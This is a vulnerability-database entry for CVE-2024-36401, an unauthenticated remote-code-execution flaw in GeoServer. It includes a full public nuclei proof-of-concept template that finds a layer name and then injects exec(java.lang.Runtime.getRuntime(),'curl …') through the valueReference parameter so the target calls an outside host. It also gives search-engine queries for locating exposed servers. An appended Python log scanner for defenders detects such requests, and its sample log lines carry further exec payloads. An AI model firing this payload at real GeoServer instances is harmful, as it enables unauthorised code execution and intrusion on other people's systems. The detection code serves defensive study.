CVE-2024-36401: GeoServer RCE in Evaluating Property Name Expressions

Date: 2025-08-01 | Affected software: GeoServer | PoC: public

Vulnerability description

In GeoServer versions prior to 2.25.1, 2.24.3 and 2.23.5, multiple OGC request parameters allow unauthenticated Remote Code Execution (RCE) through specially crafted input against a default GeoServer installation, because property names are unsafely evaluated as XPath expressions.

PoC code [public]

id: CVE-2024-36401

info:
  name: GeoServer RCE in Evaluating Property Name Expressions
  author: DhiyaneshDk,ryanborum
  severity: critical
  description: |
    In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
  impact: |
    This vulnerability can lead to executing arbitrary code.
  reference:
    - https://x.com/sirifu4k1/status/1808270303275241607
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36401
    - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
    - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv
  classification:
    epss-score: 0.94425
    epss-percentile: 0.9998
  metadata:
    verified: true
    max-request: 1
    vendor: osgeo
    product: geoserver
    shodan-query: "Server: GeoHttpServer"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
    google-query: intitle:"geoserver"
  tags: cve,cve2024,geoserver,rce,unauth,kev,vkev

flow: |
   if(http(1))
   {
   set("name",template.typename[0])
   http(2)
   }

http:
  - raw:
      - |
        GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    extractors:
      - type: regex
        name: typename
        part: body
        group: 1
        regex:
          - typeName=([^&\]]+)
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: content_type
        words:
          - "application/xml"
# digest: 4b0a00483046022100d9a3cbf6793e6a58573c7ddb096f871b19aa0e468eebacdc0b510dc1d43996b8022100b850dda3609fdfcd3c2c1b1219680979db5846df77265135ed1b8a408ab184c7:922c64590222798bb761d5b6d8e72950
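As an added defender-side example (not part of this page or of the nuclei template above), the following Python script scans GeoServer access-log lines for property-name parameters whose value is an XPath function call rather than a plain property name, which is the request shape the description and PoC above describe. The sample log lines are constructed, the `/geoserver/` path prefix and the decision to check `propertyName` alongside `valueReference` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'id') HTTP/1.1" 200 512
203.0.113.9 - - [01/Aug/2025:10:00:02 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=the_geom HTTP/1.1" 200 2048
198.51.100.2 - - [01/Aug/2025:10:00:03 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%27whoami%27%29 HTTP/1.1" 200 300
10.0.0.4 - - [01/Aug/2025:10:00:04 +0000] "GET /geoserver/web/ HTTP/1.1" 200 9000
"""

# Parameters GeoServer evaluates as property names. valueReference comes from the PoC above;
# propertyName is assumed to be one of the other "multiple OGC request parameters".
PROPERTY_PARAMS = {"valuereference", "propertyname"}

# A legitimate property name is a simple path of identifiers: "the_geom", "sf:the_geom", "a/b/@c".
BENIGN_PROPERTY = re.compile(r"^[A-Za-z_][\w:.\-]*(?:/@?[A-Za-z_][\w:.\-]*)*$")
# Function-call syntax or Java class references have no place in a property name.
HOSTILE_MARKERS = re.compile(r"\(|java\.|getRuntime|\bexec\b", re.IGNORECASE)

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*"')

def scan_line(line):
    """Return a finding dict for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    if not url.path.lower().startswith("/geoserver/"):
        return None
    # parse_qs percent-decodes once; decode again so double-encoded payloads are caught too.
    for key, values in parse_qs(url.query, keep_blank_values=True).items():
        if key.lower() not in PROPERTY_PARAMS:
            continue
        for value in values:
            value = unquote_plus(value)
            if BENIGN_PROPERTY.match(value) and not HOSTILE_MARKERS.search(value):
                continue
            return {"ip": m.group("ip"), "time": m.group("ts"), "param": key, "value": value}
    return None

def scan_log(text):
    """Scan a whole log and return the list of findings in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run against the constructed log it reports the two requests carrying an `exec(...)` expression and stays silent on the plain `the_geom` request.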
